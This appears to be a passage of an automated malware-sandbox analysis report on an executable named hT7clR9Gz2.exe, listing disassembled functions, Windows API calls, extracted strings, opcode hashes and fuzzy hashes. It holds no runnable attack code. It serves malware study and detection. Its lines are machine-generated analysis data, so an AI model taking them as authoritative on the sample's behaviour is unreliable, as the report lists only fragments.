                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 36a6194ed3bbdd6114400b6c6ba4c74e31300c1bf5eb52d6ebeb7fa7b81b218d
                                                                      • Instruction ID: 311dda5671ae6e5784f1a53ff065504bb8aafa4180417b5c9d3b3718f458da5b
                                                                      • Opcode Fuzzy Hash: 36a6194ed3bbdd6114400b6c6ba4c74e31300c1bf5eb52d6ebeb7fa7b81b218d
                                                                      • Instruction Fuzzy Hash: BBF06232602280EB9661DB6AF989C1673EAAA0CB107584819F108D7562CB7CFC80CA95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007D1FE5
                                                                      • _wcslen.LIBCMT ref: 007D1FF6
                                                                      • _wcslen.LIBCMT ref: 007D2006
                                                                      • _wcslen.LIBCMT ref: 007D2014
                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007CB371,?,?,00000000,?,?,?), ref: 007D202F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CompareString
                                                                      • String ID:
                                                                      • API String ID: 3397213944-0
                                                                      • Opcode ID: ea036d5c8a731c7b753eed3210f67032c51009ad6a406d5693680bfcf71b1896
                                                                      • Instruction ID: e20768081431f60ffaabbb7b28adc636b82d7c097c691f7f78e55b68ef08321e
                                                                      • Opcode Fuzzy Hash: ea036d5c8a731c7b753eed3210f67032c51009ad6a406d5693680bfcf71b1896
                                                                      • Instruction Fuzzy Hash: 8CF01D32108054BBCF225F51EC0DD8A7F26EB54760B118456F61A6B062DB769662D7D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 007E891E
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007E8930
                                                                      • _free.LIBCMT ref: 007E8943
                                                                      • _free.LIBCMT ref: 007E8954
                                                                      • _free.LIBCMT ref: 007E8965
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 3d4072f1602ee28a16e2010525c362f34dde05ded9dd4c909f130b3a02f8cc7b
                                                                      • Instruction ID: 5e7cea8a0b2d79290d229dd8db32e8b5de5f3a7ca344afc7f49cb20f68ae97d4
                                                                      • Opcode Fuzzy Hash: 3d4072f1602ee28a16e2010525c362f34dde05ded9dd4c909f130b3a02f8cc7b
                                                                      • Instruction Fuzzy Hash: 2AF05E72916162EBC6A6AF15FC064193FB2F72C7103058606F11C962B2CB3A8942DBD7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %ls$%s: %s
                                                                      • API String ID: 589789837-2259941744
                                                                      • Opcode ID: f4d21b9a844563dd41f6281af6b6e90923432ee7b4b9466e8af8f71566647dae
                                                                      • Instruction ID: 9a80d8b27bbfcea50460b5ca14b1f807326dce79fd061e52e1584293fb5d79e1
                                                                      • Opcode Fuzzy Hash: f4d21b9a844563dd41f6281af6b6e90923432ee7b4b9466e8af8f71566647dae
                                                                      • Instruction Fuzzy Hash: BA512731288300F6F6219AA08D4AF36B775AB04B14FA4450BF3C6746E1DDAEE410B71B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hT7clR9Gz2.exe,00000104), ref: 007E7FAE
                                                                      • _free.LIBCMT ref: 007E8079
                                                                      • _free.LIBCMT ref: 007E8083
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                      • API String ID: 2506810119-1267314390
                                                                      • Opcode ID: 2229f35537206259b73b3142a3c5492803a8699b7aa95ddd1fd564b0fa724416
                                                                      • Instruction ID: 5160f2697baa853381637e6dae861ec3cb8d5c4c024da9e08b2ee8692ed82284
                                                                      • Opcode Fuzzy Hash: 2229f35537206259b73b3142a3c5492803a8699b7aa95ddd1fd564b0fa724416
                                                                      • Instruction Fuzzy Hash: DC31B371A06298EFCB21DF9ADC84D9EBBBCEF98310F104166F90897210DA748E45CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007E31FB
                                                                      • _abort.LIBCMT ref: 007E3306
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer_abort
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 948111806-2084237596
                                                                      • Opcode ID: e0d12a697787b370e41408c3bbf61f074ceb99adcb4572326c930831b913a8db
                                                                      • Instruction ID: 9c377a45ed4bf03843f0d84cb8df9b1446af39a6c78c81e2399c86a7b7a1686b
                                                                      • Opcode Fuzzy Hash: e0d12a697787b370e41408c3bbf61f074ceb99adcb4572326c930831b913a8db
                                                                      • Instruction Fuzzy Hash: 14418D31901149EFCF16DF95CC85AEEBBB9FF08304F148159FA04AB212D339AA50DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C7406
                                                                        • Part of subcall function 007C3BBA: __EH_prolog.LIBCMT ref: 007C3BBF
                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 007C74CD
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                      • API String ID: 3813983858-639343689
                                                                      • Opcode ID: 6682fc6e980f2282f84081637b7b61e42e343e808f86d32a8bffdf1ffb4d2f24
                                                                      • Instruction ID: c690060e85da9d307c4ee8df2e2ec37cc960d4f941851866d4b767ef4799180f
                                                                      • Opcode Fuzzy Hash: 6682fc6e980f2282f84081637b7b61e42e343e808f86d32a8bffdf1ffb4d2f24
                                                                      • Instruction Fuzzy Hash: 9031B2B1E04248AADF15EBA4DC49FEE7BB9BF09314F04401EF545A7292DB7C8A44CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DAD98
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007DADAD
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 007DADC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: ASKNEXTVOL
                                                                      • API String ID: 445417207-3402441367
                                                                      • Opcode ID: 40cd080e7900efeae08272bf1ffec442cc2d3fb1117957585f58511e8db9657a
                                                                      • Instruction ID: 4dbfac9783b3da427e910a5df7796083ef1444d7b932a5c8fd243a780e3e5478
                                                                      • Opcode Fuzzy Hash: 40cd080e7900efeae08272bf1ffec442cc2d3fb1117957585f58511e8db9657a
                                                                      • Instruction Fuzzy Hash: D011E672344200BFD7219F68DC09F6A7B7AFF5B702F104016F240DB6A8C7699A069762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __fprintf_l.LIBCMT ref: 007CD954
                                                                      • _strncpy.LIBCMT ref: 007CD99A
                                                                        • Part of subcall function 007D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00801030,?,007CD928,00000000,?,00000050,00801030), ref: 007D1DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                      • String ID: $%s$@%s
                                                                      • API String ID: 562999700-834177443
                                                                      • Opcode ID: 29de3fb1ecf759a75ebea8ae8f47f5ddf8f274585f314b37a61cf471d721de2b
                                                                      • Instruction ID: 0571b5e3d8500afba18d41b1d4ff7dcf6ccb16ad5201113a48deae10af259410
                                                                      • Opcode Fuzzy Hash: 29de3fb1ecf759a75ebea8ae8f47f5ddf8f274585f314b37a61cf471d721de2b
                                                                      • Instruction Fuzzy Hash: 8321D57640024CEEDB30DEA4CC05FEE7BA8EF05304F00412EF954962A2E73AEA54DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E85
                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E8F
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007CAC5A,00000008,?,00000000,?,007CD22D,?,00000000), ref: 007D0E9F
                                                                      Strings
                                                                      • Thread pool initialization failed., xrefs: 007D0EB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                      • String ID: Thread pool initialization failed.
                                                                      • API String ID: 3340455307-2182114853
                                                                      • Opcode ID: efcf3e941caa5a3712af1f98e77cca01a414c00df1676711ab9ffa3017414f1a
                                                                      • Instruction ID: 0dc7972329b7cdbd4206af96963be6086ee0b94af1208044109cbd354a4eeaaf
                                                                      • Opcode Fuzzy Hash: efcf3e941caa5a3712af1f98e77cca01a414c00df1676711ab9ffa3017414f1a
                                                                      • Instruction Fuzzy Hash: CE1142B16407089BC3215F669C84AA7FBECEB55754F545C2FE1DAC2200DA7959408B64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DB2BE
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007DB2D6
                                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 007DB304
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: GETPASSWORD1
                                                                      • API String ID: 445417207-3292211884
                                                                      • Opcode ID: e0ccaffebc0e1bc44faf22dee9f34743eefe8fbe181a35cc8ba926b537d85f09
                                                                      • Instruction ID: 47834a8f113b098ea1a87e810d1a71e1133cb7917f1f5f2056fbb9510f0f274c
                                                                      • Opcode Fuzzy Hash: e0ccaffebc0e1bc44faf22dee9f34743eefe8fbe181a35cc8ba926b537d85f09
                                                                      • Instruction Fuzzy Hash: 81118E32A40118F6DB219A649C49FFF3B7DFF19710F110026FA45B2284C7A9AA459671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Malloc
                                                                      • String ID: (}$2}$A
                                                                      • API String ID: 2696272793-517537644
                                                                      • Opcode ID: f5f914b7ba2d4f3db421fec2e2da2b129560b7922434e0a73e4893a7daea63e2
                                                                      • Instruction ID: ee1ce43404a25320be00a9e926886025745491c2d395ba7ec97a98f3f8df6c1c
                                                                      • Opcode Fuzzy Hash: f5f914b7ba2d4f3db421fec2e2da2b129560b7922434e0a73e4893a7daea63e2
                                                                      • Instruction Fuzzy Hash: F901DB75A01219ABDB14DFA4D854AEEBBF8BF09310B10416AE906E3250D7789A41DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                      • API String ID: 0-56093855
                                                                      • Opcode ID: d51686f3fbaf385d534bd2e30eb56f112e3c85ff69802d1c5c0cfda1551e44c6
                                                                      • Instruction ID: c4fab17d6b495c9af0ede77274fa7997bb3196123ee3057106916617182ab283
                                                                      • Opcode Fuzzy Hash: d51686f3fbaf385d534bd2e30eb56f112e3c85ff69802d1c5c0cfda1551e44c6
                                                                      • Instruction Fuzzy Hash: 1B01B176604A49EFDF618FA4FC04AAA7BBAF708354B004027F94593331C6389C90DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C1316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007CE2E8: _swprintf.LIBCMT ref: 007CE30E
                                                                        • Part of subcall function 007CE2E8: _strlen.LIBCMT ref: 007CE32F
                                                                        • Part of subcall function 007CE2E8: SetDlgItemTextW.USER32(?,007FE274,?), ref: 007CE38F
                                                                        • Part of subcall function 007CE2E8: GetWindowRect.USER32(?,?), ref: 007CE3C9
                                                                        • Part of subcall function 007CE2E8: GetClientRect.USER32(?,?), ref: 007CE3D5
                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                      • SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                      • String ID: }$0
                                                                      • API String ID: 2622349952-681118444
                                                                      • Opcode ID: 2baf9aa8bad8f8f95e826c92ee0083367880053d0694c92a1deffeb3a917c19b
                                                                      • Instruction ID: 930bb35a54b97d8158218a73d2cc191a8250ddb7899ac437d5c6a1fad0ad7194
                                                                      • Opcode Fuzzy Hash: 2baf9aa8bad8f8f95e826c92ee0083367880053d0694c92a1deffeb3a917c19b
                                                                      • Instruction Fuzzy Hash: CEF031301042C8E6EF151F618C1EFA93B59BB4635DF44812DFD8455992CB7CC9A59B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
